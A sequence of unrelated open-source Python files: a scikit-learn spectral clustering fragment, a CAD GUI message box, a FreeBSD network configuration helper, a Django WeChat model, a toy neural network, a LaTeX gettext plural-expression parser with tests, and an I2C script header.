"will be removed in 0.15.",
DeprecationWarning)
n_clusters = k
if mode is not None:
warnings.warn("'mode' was renamed to eigen_solver and "
"will be removed in 0.15.",
DeprecationWarning)
eigen_solver = mode
self.n_clusters = n_clusters
self.eigen_solver = eigen_solver
self.random_state = random_state
self.n_init = n_init
self.gamma = gamma
self.affinity = affinity
self.n_neighbors = n_neighbors
self.eigen_tol = eigen_tol
self.assign_labels = assign_labels
def fit(self, X):
"""Creates an affinity matrix for X using the selected affinity,
then applies spectral clustering to this affinity matrix.
Parameters
----------
X : array-like or sparse matrix, shape (n_samples, n_features)
OR, if affinity==`precomputed`, a precomputed affinity
matrix of shape (n_samples, n_samples)
"""
if X.shape[0] == X.shape[1] and self.affinity != "precomputed":
warnings.warn("The spectral clustering API has changed. ``fit``"
"now constructs an affinity matrix from data. To use"
" a custom affinity matrix, "
"set ``affinity=precomputed``.")
if self.affinity == 'rbf':
self.affinity_matrix_ = rbf_kernel(X, gamma=self.gamma)
elif self.affinity == 'nearest_neighbors':
connectivity = kneighbors_graph(X, n_neighbors=self.n_neighbors)
self.affinity_matrix_ = 0.5 * (connectivity + connectivity.T)
elif self.affinity == 'precomputed':
self.affinity_matrix_ = X
else:
raise ValueError("Invalid 'affinity'. Expected 'rbf', "
"'nearest_neighbors' or 'precomputed', got '%s'."
% self.affinity)
self.random_state = check_random_state(self.random_state)
self.labels_ = spectral_clustering(self.affinity_matrix_,
n_clusters=self.n_clusters,
eigen_solver=self.eigen_solver,
random_state=self.random_state,
n_init=self.n_init,
eigen_tol=self.eigen_tol,
assign_labels=self.assign_labels)
return self
@property
def _pairwise(self):
return self.affinity == "precomputed"
|
mrshu/scikit-learn
|
sklearn/cluster/spectral.py
|
Python
|
bsd-3-clause
| 17,408
|
# -*- coding: utf-8 -*-
############################################################################
#
# Copyright (C) 2011-2014
# Christian Kohlöffel
#
# This file is part of DXF2GCODE.
#
# DXF2GCODE is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# DXF2GCODE is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with DXF2GCODE. If not, see <http://www.gnu.org/licenses/>.
#
############################################################################
"""
Special purpose canvas including all required plotting function etc.
"""
from globals.six import text_type
import globals.constants as c
if c.PYQT5notPYQT4:
from PyQt5.QtWidgets import QTextBrowser
from PyQt5 import QtCore
else:
from PyQt4.QtGui import QTextBrowser
from PyQt4 import QtCore
class MessageBox(QTextBrowser):
"""
The MessageBox Class performs the write functions in the Message Window.
The previous defined MessageBox class is used as output (Within ui).
@sideeffect: None
"""
def __init__(self, origobj):
"""
Initialization of the MessageBox class.
@param origobj: This is the reference to to parent class initialized
previously.
"""
super(MessageBox, self).__init__()
self.setOpenExternalLinks(True)
self.append(self.tr("You are using DXF2GCODE"))
self.append(self.tr("Version %s (%s)") % (c.VERSION, c.DATE))
self.append(self.tr("For more information and updates visit:"))
self.append("<a href='http://sourceforge.net/projects/dxf2gcode/'>http://sourceforge.net/projects/dxf2gcode/</a>")
def tr(self, string_to_translate):
"""
Translate a string using the QCoreApplication translation framework
@param: string_to_translate: a unicode string
@return: the translated unicode string if it was possible to translate
"""
return text_type(QtCore.QCoreApplication.translate('MessageBox',
string_to_translate))
def write(self, string):
"""
The function is called by the window logger to write
the log message to the Messagebox
@param charstr: The log message which will be written.
"""
stripped_string = string.strip()
if stripped_string:
self.append(stripped_string)
self.verticalScrollBar().setValue(1e9)
|
Poofjunior/dxf2gcode
|
gui/messagebox.py
|
Python
|
gpl-3.0
| 2,949
|
# vim: tabstop=4 shiftwidth=4 softtabstop=4
#
# Copyright (c) 2011 Openstack, LLC.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
#
"""
FreeBSD network helper module
"""
# FreeBSD network configuration uses:
# - 1 shell-script-style global configuration file (/etc/rc.conf)
# - 1 IP per interface
# - routes are global
# - gateways are global
# - DNS is configured via resolv.conf
import os
import re
import time
import subprocess
import logging
from cStringIO import StringIO
import commands.network
RCCONF_FILE = "/etc/rc.conf"
def get_hostname():
"""
Will fetch current hostname of VM if any and return.
Looks at /etc/rc.conf config for FreeBSD server.
"""
try:
with open(RCCONF_FILE) as hostname_fyl:
for line in hostname_fyl.readlines():
hn = re.search('hostname=(.*)', line)
if hn:
return hn.group(1)
return None
except Exception, e:
logging.info("Current FreeBSD hostname enquiry failed: %s" % str(e))
return None
def fetch_all_from_xendict(interfaces, keyname):
xens = interfaces.keys()
values = []
for xen in xens:
for keyval in interfaces.get(xen, []).get(keyname, []):
values.append(keyval.encode('ascii','ignore'))
if '' in values:
values.remove('')
return list(set(values))
def configure_network(hostname, interfaces):
update_files = {}
# Unset LD_LIBRARY_PATH
env = os.environ.copy()
if 'LD_LIBRARY_PATH' in env:
del env['LD_LIBRARY_PATH']
# Generate new /etc/rc.conf
data = _get_file_data(interfaces, hostname)
update_files[RCCONF_FILE] = data
# Generate new /etc/resolv.conf file
# Uses resolvconf utility if present else creates /etc/resolv.conf
nameservers = fetch_all_from_xendict(interfaces, 'dns')
if not commands.network.update_resolvconf(nameservers):
filepath, data = commands.network.get_resolv_conf(interfaces)
if data:
update_files[filepath] = data
# Generate new /etc/hosts file
filepath, data = commands.network.get_etc_hosts(interfaces, hostname)
update_files[filepath] = data
# Write out new files
commands.network.update_files(update_files)
pipe = subprocess.PIPE
# Set hostname
try:
commands.network.sethostname(hostname)
except Exception, e:
logging.error("Couldn't sethostname(): %s" % str(e))
return (500, "Couldn't set hostname: %s" % str(e))
# Restart network
logging.debug('executing /etc/rc.d/netif restart')
p = subprocess.Popen(["/bin/sh", "/etc/rc.d/netif", "restart"],
stdin=pipe, stdout=pipe, stderr=pipe, env=env)
logging.debug('waiting on pid %d' % p.pid)
status = os.waitpid(p.pid, 0)[1]
logging.debug('status = %d' % status)
if status != 0:
return (500, "Couldn't restart IPv4 networking: %d" % status)
# Restart network
if os.path.exists("/etc/rc.d/network_ipv6"):
logging.debug('executing /etc/rc.d/network_ipv6 restart')
p = subprocess.Popen(["/etc/rc.d/network_ipv6", "restart"],
stdin=pipe, stdout=pipe, stderr=pipe, env={})
logging.debug('waiting on pid %d' % p.pid)
status = os.waitpid(p.pid, 0)[1]
logging.debug('status = %d' % status)
if status != 0:
return (500, "Couldn't restart IPv6 networking: %d" % status)
# Restart routing
logging.debug('executing /etc/rc.d/routing restart')
p = subprocess.Popen(["/bin/sh", "/etc/rc.d/routing", "restart"],
stdin=pipe, stdout=pipe, stderr=pipe, env=env)
logging.debug('waiting on pid %d' % p.pid)
status = os.waitpid(p.pid, 0)[1]
logging.debug('status = %d' % status)
#if status != 0:
# return (500, "Couldn't restart network routing: %d" % status)
return (0, "")
def _create_rcconf_file(infile, interfaces, hostname):
"""
Return new rc.conf, merging in 'infile'
"""
ipv6_interfaces = []
static_route_entries = []
outfile = StringIO()
for line in infile:
line = line.strip()
if line.startswith("ifconfig") or \
line.startswith("defaultrouter") or \
line.startswith("ipv6_ifconfig") or \
line.startswith("ipv6_defaultrouter") or \
line.startswith("ipv6_enable") or \
line.startswith("static_routes") or \
line.startswith("route_") or \
line.startswith("dhcpd_") or \
line.startswith("hostname"):
continue
print >> outfile, line
print >> outfile, 'dhcpd_enable="NO"'
print >> outfile, 'hostname=%s' % hostname
gateway4, gateway6 = commands.network.get_gateways(interfaces)
ifnames = interfaces.keys()
ifnames.sort()
for ifname_prefix in ifnames:
interface = interfaces[ifname_prefix]
label = interface.get('label')
ip4s = interface['ip4s']
ip6s = interface['ip6s']
if ip6s:
ipv6_interfaces.append(ifname_prefix)
ifname_suffix_num = 0
for ip4, ip6 in map(None, ip4s, ip6s):
if ifname_suffix_num:
ifname = "%s_alias%d" % (ifname_prefix, ifname_suffix_num - 1)
else:
ifname = ifname_prefix
if label:
print >>outfile, '# Label %s' % label
if ip4:
if ifname_suffix_num:
# XXX -- Known bug here. If we're adding an alias
# that is on the same network as another address already
# configured, the netmask here should be 255.255.255.255
print >> outfile, 'ifconfig_%s="%s netmask %s"' % \
(ifname, ip4['address'], ip4['netmask'])
else:
print >> outfile, 'ifconfig_%s="%s netmask %s up"' % \
(ifname, ip4['address'], ip4['netmask'])
if ip6:
print >> outfile, 'ipv6_ifconfig_%s="%s/%s"' % \
(ifname, ip6['address'], ip6['prefixlen'])
ifname_suffix_num += 1
for route in interface['routes']:
if route['network'] == '0.0.0.0' and \
route['netmask'] == '0.0.0.0' and \
route['gateway'] == gateway4:
continue
if ':' in route['network']:
# ipv6
fmt = '-net %(network)s/%(netmask)s %(gateway)s'
else:
fmt = '-net %(network)s -netmask %(netmask)s %(gateway)s'
static_route_entries.append(fmt % route)
if static_route_entries:
names = []
for i, line in enumerate(static_route_entries):
name = 'lan%d' % i
names.append(name)
print >> outfile, 'route_%s="%s"' % (name, line)
print >> outfile, 'static_routes="%s"' % ' '.join(names)
if ipv6_interfaces:
print >> outfile, 'ipv6_enable="YES"'
print >> outfile, 'ipv6_network_interfaces="%s"' % \
','.join(ipv6_interfaces)
if gateway4:
print >> outfile, 'defaultrouter="%s"' % gateway4
if gateway6:
print >> outfile, 'ipv6_defaultrouter="%s%%%s"' % \
(gateway6, 'xn0')
outfile.seek(0)
return outfile.read()
def _get_file_data(interfaces, hostname):
"""
Return the data for a new rc.conf file
"""
return _create_rcconf_file(open(RCCONF_FILE), interfaces, hostname)
|
rackerlabs/openstack-guest-agents-unix
|
commands/freebsd/network.py
|
Python
|
apache-2.0
| 8,163
|
# -*- coding: utf-8 -*-
import logging
from django.db import models
from system.official_account.models import OfficialAccount
from system.rule.models import Rule
logger_rule_match = logging.getLogger(__name__)
class RuleMatchManager(models.Manager):
"""
微信规则回复表 Manager
"""
def add(self, rule, plugin_iden, reply_id=0, order=0, status=True):
"""
添加微信规则回复
"""
rule_match = super(RuleMatchManager, self).create(
official_account=rule.official_account,
rule=rule,
plugin_iden=plugin_iden,
reply_id=reply_id,
order=order,
status=status
)
logger_rule_match.info('New rule_match created [Detail] %s' % rule_match.__dict__)
return rule_match
def get(self, rule):
"""
根据 rule 返回相应的 QuerySet 集合
返回的集合已经按照优先级排序完毕, 且剔除掉了没有启用的匹配
"""
return super(RuleMatchManager, self).get_queryset().filter(
official_account=rule.official_account
).filter(
rule=rule
).filter(
status=True
).order_by(
'-order', 'id'
)
def get_news(self, news_id):
"""
根据 news_id 返回表中所有对应的图文匹配集合
:param news_id: 图文响应ID
"""
return super(RuleMatchManager, self).get_queryset().filter(
plugin_iden='news'
).filter(
reply_id=news_id
)
class RuleMatch(models.Model):
"""
微信规则匹配表
"""
official_account = models.ForeignKey(OfficialAccount, verbose_name=u'所属公众号')
rule = models.ForeignKey(Rule, verbose_name=u'所属规则')
plugin_iden = models.CharField(u'响应插件标识符', max_length=50)
reply_id = models.PositiveIntegerField(u'响应ID号', default=0)
order = models.PositiveIntegerField(u'优先级', default=0)
status = models.BooleanField(u'是否启用', default=True)
objects = models.Manager()
manager = RuleMatchManager()
class Meta:
verbose_name = u'微信规则匹配表'
verbose_name_plural = u'微信规则匹配表'
db_table = 'wechat_rule_match'
def __unicode__(self):
return self.plugin_iden
|
doraemonext/wechat-platform
|
wechat_platform/system/rule_match/models.py
|
Python
|
bsd-2-clause
| 2,385
|
# net.py
# A dead-simple neural network
#
# Potential improvements:
# - Support topologies other than 1 hidden layer
# - Add other training strategies (adaptive learning rate, momentum)
# - Add more error checking
import numpy as np
class Net(object):
"""
Neural network class with:
- 1 hidden layer
- Arbitrary number of neurons in each layer
- Sigmoid activation function f(x) = 1 / (1 + exp(-x))
- Bias nodes in input/hidden layers
- Gradient descent training
:Parameters:
inp_range: list (num_inputs x 2)
List of input ranges
Input values are scaled so that (min -> -1) and (max -> +1)
hidden_count: int
Number of neurons in the hidden layer
output_count: int
Number of neurons in the output layer (= number of output signals)
:Internals:
size_inp, size_hid, size_out: ints
Number of neurons in input, hidden, and output layers
w_in: 2D array
Connections between input and hidden, so that
hidden = activate(w_in * input)
w_out: 2D array
Connections between input and output, so that
output = w_out * input
:Example:
# Two inputs (ranges [1,2] and [3,4])
# One hidden layer (2 neurons)
# One output layer (1 neuron)
net = Net([[1, 2], [3, 4]], 2, 1)
"""
def __init__(self, inp_range, hidden_count, output_count):
# Make sure input matrix is Nx2 (ie: min + max for each)
try:
assert np.shape(inp_range)[1] == 2
except:
raise ValueError("Invalid shape for inp_range - need [min, max] for each node")
# Size of each layer
self.size_inp = np.shape(inp_range)[0]
self.size_hid = hidden_count
self.size_out = output_count
# Input ranges
self.inp_range = np.array(inp_range)
self.inp_min = np.reshape(self.inp_range[:, 0], [self.size_inp, -1])
self.inp_max = np.reshape(self.inp_range[:, 1], [self.size_inp, -1])
self.inp_span = self.inp_max - self.inp_min
# Random connections
self.w_in = np.random.random([self.size_hid, self.size_inp+1])-0.5
self.w_out = np.random.random([self.size_out, self.size_hid+1])-0.5
def _activate(self, layer):
"""
Perform the activation function on each neuron in the layer
Used on hidden layers
"""
return np.array([1 / (1 + np.exp(-x)) for x in layer])
def _addBias(self, layer):
"""
Add a bias node to the current layer
(ie: a neuron that always outputs 1)
"""
return np.vstack((layer, [1]))
def _scaleInput(self, input):
"""
Scale the input values such that:
Input | Output
--------------+--------
min | -1
(min+max)/2 | 0
max | +1
:Inputs:
input: 1D list of length size_inp
:Returns:
1D list of same length, with all values scaled (as described)
"""
input -= self.inp_min
input /= self.inp_span
return input
def _forwardProp(self, input):
"""
Perform forward propagation, saving the values at each layer
:Inputs:
input: a (size_inp x 1) array
:Returns:
A list of 3 1D arrays of length (size_inp, size_hid, size_out)
Calculated values at each node in all 3 layers
"""
# Save intermediate results
o = []
# Input
layer = np.array(input, copy=True)
layer = np.reshape(layer, [-1, 1])
layer = self._scaleInput(layer)
layer = self._addBias(layer)
o.append(layer)
# Hidden
layer = self._activate(np.dot(self.w_in, layer))
layer = self._addBias(layer)
o.append(layer)
# Output
layer = np.dot(self.w_out, layer)
o.append(layer)
return o
def _backProp(self, o, target):
"""
Perform backward propagation, calculating deltas at each node
:Inputs:
o: list of 3 arrays (1 x size_inp, 1 x size_hid, 1 x size_out)
Output values at each node
target: (1 x size_out) array of
Expected values at output layer
:Returns:
List of 2 arrays (1 x size_hid, 1 x size_out)
Delta_j values at each node in hidden and output layers
"""
delta = [[] for _ in range(2)]
delta[0] = np.zeros([self.size_hid, 1])
# Output delta
delta[1] = o[2] - np.reshape(target, [-1, 1])
# Hidden delta
for j in range(self.size_hid):
for k in range(self.size_out):
delta[0][j] += delta[1][k] * self.w_out[k][j]
delta[0][j] *= o[1][j] * (1 - o[1][j])
return delta
def sim(self, input):
"""
Find the output values, given a set of input values
:Inputs:
input: a 1D array of length size_inp
:Returns:
A 1D array of length size_out
"""
# Make sure the input is the right size
try:
size = np.shape(input)[0]
assert size == self.size_inp
except:
raise ValueError("Expected input of size {}; got {}".format(size, self.size_inp))
# We only need to do forward propagation
input = np.reshape(np.array(input), [-1, 1])
return self._forwardProp(input)[2]
def train_1(self, input, target, lr):
"""
Perform forward propagation to get the output values,
then backward propagation to update the weights
Repeat for a number of tests
:Inputs:
input: 2D array
A <tests>x<size_inp> array. The input for test i is input[i, :]
target: 2D array
A <tests>x<size_out> array. The target for test i is target[i, :]
lr: float
Learning rate - preferably in the range (0, 1)
:Returns:
The error (SSE) accumulated over all of the inputs
"""
# Make sure the input is the right size
try:
size = np.shape(input)[1]
assert size == self.size_inp
except:
raise ValueError("Expected input of size {}; got {}".format(size, self.size_inp))
# Keep track of total error in tests
error = 0
# Optional: reorder test cases randomly (does this help?)
order = range(len(input))
np.random.shuffle(order)
for i in order:
# Forward propagation
o = self._forwardProp(input[i])
# Backward propagation
delta = self._backProp(o, target[i, :])
# Update weights
delta_w_out = -lr * np.dot(delta[1], np.reshape(o[1], [1, -1]))
delta_w_in = -lr * np.dot(delta[0], np.reshape(o[0], [1, -1]))
self.w_out += delta_w_out
self.w_in += delta_w_in
# Add this error to running total
error += np.sum((o[2] - np.reshape(target[i], [-1, 1]))**2)
return error
def train_many(self, input, target, lr, epochs, goal, verbose=False):
"""
Train on the same data set multiple times,
Stop as soon as target accuracy or max epochs are reached.
:Inputs:
input: 2D array
A <tests>x<size_inp> array. The input for test i is input[i, :]
target: 2D array
A <tests>x<size_out> array. The target for test i is target[i, :]
lr: float
Learning rate - preferably in the range (0, 1)
epochs: int
Maximum number of training iterations
goal: float
Target accuracy.
verbose: boolean
If true, print error at each epoch
:Returns:
A list of the error at each epoch
"""
error = []
for i in range(epochs):
nextError = self.train_1(input, target, lr)
if verbose:
print "{}: {}".format(i+1, nextError)
error.append(nextError)
if nextError < goal:
break
return error
def main():
"""
Test code: learn XOR with 3 hidden nodes
"""
# Set up neural net
net = Net([[0, 1], [0, 1]], 3, 1)
# Set up dataset
input = np.array([[0, 0], [0, 1], [1, 0], [1, 1]]*20)
target = np.array([[0], [1], [1], [0] ]*20)
# Print it to check
#print input
#print target
# Train for 100 epochs
error = net.train_many(input, target, 0.4, 100, 0.01)
#print "\n".join(map(str, error))
# Check that we've learned everything
print net.sim([0, 0]) # 0
print net.sim([0, 1]) # 1
print net.sim([1, 0]) # 1
print net.sim([1, 1]) # 0
#print net.sim([1, 1, 1]) # ValueError()
if __name__ == "__main__":
main()
|
gregdeon/simple-ann
|
src/net.py
|
Python
|
mit
| 9,516
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import re
import subprocess
import sys
import unittest
COMMAND_PREFIX = 'gettextmath'
def generate_command_call(name, prefix, *args):
return '\\' + prefix + name + '{' + '}{'.join(args) + '}'
class Parser:
class Token:
function = False
def process(self, stack, output):
output.append(self)
def consume(self, stack):
stack.append(self)
def __repr__(self):
return str(self)
class Number(Token):
def __init__(self, number):
self.number = int(number)
def generate(self):
return str(self.number)
def __eq__(self, other):
return isinstance(other, Parser.Number) and self.number == other.number
def __str__(self):
return 'Number({})'.format(self.number)
class Identifier(Token):
def __init__(self, identifier):
self.identifier = identifier
def generate(self):
return self.identifier
def __eq__(self, other):
return isinstance(other, Parser.Identifier) and self.identifier == other.identifier
def __str__(self):
return 'Identifier("{}")'.format(self.identifier)
class Operator(Token):
function = True
def __init__(self, operation):
self.operation = operation
def process(self, stack, output):
while len(stack) > 0 and stack[len(stack)-1].priority < self.priority:
output.append(stack.pop())
stack.append(self)
def __eq__(self, other):
return type(self) == type(other) and self.operation == other.operation
def __str__(self):
return 'Operator("{}")'.format(self.operation)
class BinaryOperator(Operator):
def consume(self, stack):
self.arg2 = stack.pop()
self.arg1 = stack.pop()
stack.append(self)
def generate(self):
return generate_command_call(self.command, COMMAND_PREFIX, self.arg1.generate(), self.arg2.generate())
class OperatorEqual(BinaryOperator):
priority = 7
command = 'equal'
class OperatorNotEqual(BinaryOperator):
priority = 7
command = 'notequal'
class OperatorGreaterEqual(BinaryOperator):
priority = 6
command = 'greaterequal'
class OperatorLesserEqual(BinaryOperator):
priority = 6
command = 'lesserequal'
class OperatorGreaterThan(BinaryOperator):
priority = 6
command = 'greaterthan'
class OperatorLesserThan(BinaryOperator):
priority = 6
command = 'lesserthan'
class OperatorAnd(BinaryOperator):
priority = 11
command = 'and'
class OperatorOr(BinaryOperator):
priority = 12
command = 'or'
class OperatorModulo(BinaryOperator):
priority = 3
command = 'modulo'
class OperatorTernaryStart(Operator):
priority = 100
function = False
def consume(self, stack):
self.arg_truefalse = stack.pop()
self.arg_condition = stack.pop()
if not isinstance(self.arg_truefalse, Parser.OperatorTernaryMiddle):
raise Exception('Operator "?" must have matching ":", but "{}" found'.format(self.arg_truefalse))
stack.append(self)
def generate(self):
return generate_command_call('ifthenelse', COMMAND_PREFIX, self.arg_condition.generate(), self.arg_truefalse.true.generate(), self.arg_truefalse.false.generate())
class OperatorTernaryMiddle(Operator):
priority = 100
function = False
def consume(self, stack):
self.false = stack.pop()
self.true = stack.pop()
stack.append(self)
class OpenParenthesis(Token):
priority = 100
def process(self, stack, output):
stack.append(self)
def __str__(self):
return 'OpenParenthesis'
class CloseParenthesis(Token):
priority = 100
def process(self, stack, output):
while len(stack) > 0 and not isinstance(stack[len(stack)-1], Parser.OpenParenthesis):
x = stack.pop()
output.append(x)
open = stack.pop()
if not isinstance(open, Parser.OpenParenthesis):
raise Exception('Could not find matching left parenthesis')
if len(stack) > 0 and stack[len(stack)-1].function:
output.append(stack.pop())
def __str__(self):
return 'CloseParenthesis'
tokens = [
# boolean operations
(re.compile(r'^(==)'), OperatorEqual),
(re.compile(r'^(!=)'), OperatorNotEqual),
(re.compile(r'^(>=)'), OperatorGreaterEqual),
(re.compile(r'^(<=)'), OperatorLesserEqual),
(re.compile(r'^(>)'), OperatorGreaterThan),
(re.compile(r'^(<)'), OperatorLesserThan),
(re.compile(r'^(&&)'), OperatorAnd),
(re.compile(r'^(\|\|)'), OperatorOr),
(re.compile(r'^(\?)'), OperatorTernaryStart),
(re.compile(r'^(:)'), OperatorTernaryMiddle),
# arithmentic operations
(re.compile(r'^(%)'), OperatorModulo),
# parenthesis
(re.compile(r'^\('), OpenParenthesis),
(re.compile(r'^\)'), CloseParenthesis),
# others
(re.compile(r'^([0-9]+)'), Number),
(re.compile(r'^([_A-Za-z][_A-Za-z0-9]*)'), Identifier),
(re.compile(r'^\s+'), None),
]
def __init__(self, source):
self.source = source
self.overriden_identifiers = {}
def override_identifier(self, old_identifier, new_identifier):
self.overriden_identifiers[old_identifier] = new_identifier
def parse(self):
source = self.source
output = []
stack = []
while len(source) > 0:
for i in self.tokens:
m = i[0].match(source)
if m:
break
if not m:
raise Exception('No token matches "{}<...>"'.format(source[:10]))
source = source[len(m.group(0)):]
token = i[1]
if not token:
continue
args = m.groups()
token = token(*args)
token = token.process(stack, output)
while len(stack) > 0:
output.append(stack.pop())
o = []
for i in output:
if isinstance(i, Parser.Identifier):
o.append(Parser.Identifier(self.overriden_identifiers.get(i.identifier, i.identifier)))
else:
o.append(i)
output = o
return output
class Generator:
def __init__(self, queue):
self.queue = queue
def generate(self):
stack = []
for i in self.queue:
i.consume(stack)
if len(stack) != 1:
raise Exception('RPN processing problem, stack size is not 1 ({})'.format(repr(stack)))
r = stack[0]
r = r.generate()
return r
def generate_command(name, source, new_command=True):
s = '\\newcommand' if new_command else '\\renewcommand'
s += '{'+name+'}[1]{'
parser = Parser(source)
parser.override_identifier('n', '#1')
s += Generator(parser.parse()).generate()
s += '}'
return s
class TestMath(unittest.TestCase):
def test_parser(self):
exprs = [(
'0',
[Parser.Number(0),]
),(
'1',
[Parser.Number(1),]
),(
'01',
[Parser.Number(1),]
),(
'0 1',
[Parser.Number(0), Parser.Number(1)]
),(
'0 == 1',
[Parser.Number(0), Parser.Number(1), Parser.OperatorEqual('==')]
),(
'0%2 == 1',
[
Parser.Number(0),
Parser.Number(2),
Parser.OperatorModulo('%'),
Parser.Number(1),
Parser.OperatorEqual('==')
]
),(
'0 == 1%2',
[
Parser.Number(0),
Parser.Number(1),
Parser.Number(2),
Parser.OperatorModulo('%'),
Parser.OperatorEqual('==')
]
),(
'0 ? 1 : 2',
[
Parser.Number(0),
Parser.Number(1),
Parser.Number(2),
Parser.OperatorTernaryMiddle(':'),
Parser.OperatorTernaryStart('?')
]
),(
'3 ? 4 : 5 ? 1 : 2',
[
Parser.Number(3),
Parser.Number(4),
Parser.Number(5),
Parser.Number(1),
Parser.Number(2),
Parser.OperatorTernaryMiddle(':'),
Parser.OperatorTernaryStart('?'),
Parser.OperatorTernaryMiddle(':'),
Parser.OperatorTernaryStart('?')
]
),(
'3%6 ? 4%7 : 5%8 ? 1%9 : 2%10',
[
Parser.Number(3),
Parser.Number(6),
Parser.OperatorModulo('%'),
Parser.Number(4),
Parser.Number(7),
Parser.OperatorModulo('%'),
Parser.Number(5),
Parser.Number(8),
Parser.OperatorModulo('%'),
Parser.Number(1),
Parser.Number(9),
Parser.OperatorModulo('%'),
Parser.Number(2),
Parser.Number(10),
Parser.OperatorModulo('%'),
Parser.OperatorTernaryMiddle(':'),
Parser.OperatorTernaryStart('?'),
Parser.OperatorTernaryMiddle(':'),
Parser.OperatorTernaryStart('?')
]
),(
'n?0:a?1:2',
[
Parser.Identifier('n'),
Parser.Number(0),
Parser.Identifier('a'),
Parser.Number(1),
Parser.Number(2),
Parser.OperatorTernaryMiddle(':'),
Parser.OperatorTernaryStart('?'),
Parser.OperatorTernaryMiddle(':'),
Parser.OperatorTernaryStart('?')
]
),(
'n?0:(a)?1:2',
[
Parser.Identifier('n'),
Parser.Number(0),
Parser.Identifier('a'),
Parser.Number(1),
Parser.Number(2),
Parser.OperatorTernaryMiddle(':'),
Parser.OperatorTernaryStart('?'),
Parser.OperatorTernaryMiddle(':'),
Parser.OperatorTernaryStart('?')
]
),(
'n==1 ? 0 : (a || b) ? 1 : 2',
[
Parser.Identifier('n'),
Parser.Number(1),
Parser.OperatorEqual('=='),
Parser.Number(0),
Parser.Identifier('a'),
Parser.Identifier('b'),
Parser.OperatorOr('||'),
Parser.Number(1),
Parser.Number(2),
Parser.OperatorTernaryMiddle(':'),
Parser.OperatorTernaryStart('?'),
Parser.OperatorTernaryMiddle(':'),
Parser.OperatorTernaryStart('?')
]
)]
for i in exprs:
parser = Parser(i[0])
self.assertEqual(i[1], parser.parse(), 'expression parsed incorrectly: "{}"'.format(i[0]))
def test_calculations(self):
functions = [(
'0',
lambda n: 0
),(
'n != 1',
lambda n: int(n != 1)
),(
'n>1',
lambda n: int(n > 1)
),(
'n>1 ? 1 : 0',
lambda n: 1 if n > 1 else 0
),(
'n==0 ? 10 : n==1 ? 11 : 12',
lambda n: 10 if n == 0 else (11 if n == 1 else 12)
),(
'n%10==1 && n%100!=11 ? 0 : n != 0 ? 1 : 2',
lambda n: 0 if n%10 == 1 and n%100 != 11 else (1 if n != 0 else 2)
),(
'n==1 ? 0 : n==2 ? 1 : 2',
lambda n: 0 if n == 1 else (1 if n == 2 else 2)
),(
'n==1 ? 0 : (n==0 || (n%100 > 0 && n%100 < 20)) ? 1 : 2',
lambda n: 0 if n == 1 else (1 if (n == 0 or (n%100 > 0 and n%100 < 20)) else 2)
),(
'n%10==1 && n%100!=11 ? 0 : n%10>=2 && (n%100<10 || n%100>=20) ? 1 : 2',
lambda n: 0 if n%10 == 1 and n%100 != 11 else (1 if n%10>=2 and (n%100<10 or n%100>=20) else 2)
),(
'n%10==1 && n%100!=11 ? 0 : n%10>=2 && n%10<=4 && (n%100<10 || n%100>=20) ? 1 : 2',
lambda n: 0 if n%10 == 1 and n%100 != 11 else (1 if n%10>=2 and n%10<=4 and (n%100<10 or n%100>=20) else 2)
),(
'(n==1) ? 0 : (n>=2 && n<=4) ? 1 : 2',
lambda n: 0 if n == 1 else (1 if n >= 2 and n <= 4 else 2)
),(
'n==1 ? 0 : n%10>=2 && n%10<=4 && (n%100<10 || n%100>=20) ? 1 : 2',
lambda n: 0 if n == 1 else (1 if n%10 >= 2 and n%10 <= 4 and (n%100 < 10 or n%100 >= 20) else 2)
),(
'n%100==1 ? 0 : n%100==2 ? 1 : n%100==3 || n%100==4 ? 2 : 3',
lambda n: 0 if n%100 == 1 else (1 if n%100 == 2 else (2 if n%100 == 3 or n%100 == 4 else 3))
)]
re_text = re.compile(r'<text(.*?)>(.*?)</text>', re.DOTALL)
re_tspan = re.compile(r'</?tspan(.*?)>', re.DOTALL)
TEST_FILE_PREFIX = '_test'
for i in functions:
sys.stderr.write('*')
sys.stderr.flush()
for n in list(range(0,30))+list(range(40,300,10))+list(range(400,3000,100)):
sys.stderr.write('.')
sys.stderr.flush()
with open(TEST_FILE_PREFIX+'.tex', 'w') as f:
f.write('\documentclass{article}\n')
f.write('\\usepackage{tipa}\n')
f.write('\\usepackage{gettext}\n')
f.write(generate_command('\\testfn', i[0]))
f.write('\n')
f.write('\\begin{document}\n')
f.write('\\testfn{''')
f.write(str(n))
f.write('}\n')
f.write('\\end{document}')
kwargs = dict(stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)
subprocess.check_call(['latex', TEST_FILE_PREFIX+'.tex'], **kwargs)
subprocess.check_call(['dvisvgm', TEST_FILE_PREFIX+'.dvi'], **kwargs)
with open(TEST_FILE_PREFIX+'.svg') as f:
f = f.read()
f = f.replace('\n', '')
f = re_text.findall(f)
f = [ re_tspan.sub(' ', i[1]) for i in f ]
f = ''.join(f)
f = f.strip()
if f.endswith('1'): #strip page number
f = f[:-1]
f = f.strip()
f = int(f)
expected = i[1](n)
actual = f
self.assertEqual(expected, actual)
if __name__ == '__main__':
import unittest
unittest.main()
|
mplucinski/tex-gettext
|
tex_math.py
|
Python
|
bsd-2-clause
| 15,267
|
# -*- coding: utf-8 -*-
# Distributed under the terms of the GNU General Public License v2
|
apinsard/appi
|
.skel.py
|
Python
|
gpl-2.0
| 91
|
#coding=gbk
#####################################################################################################
# Program test environment
# Pyhone version:3.4.1
# Firmware version:2.8.28
# Dependent files(MacOSX):libGinkgo_Driver.dylib,libusb-0.1.4.dylib,libusb-1.0.0.dylib,ControlI2C.py
# Dependent files(Windows):Ginkgo_Driver.dll,ControlI2C.py
# Dependent files(Linux):libGinkgo_Driver.so,libusb-1.0.so,ControlI2C.py
#####################################################################################################
from ctypes import *
from time import sleep
# import USB-I2C module
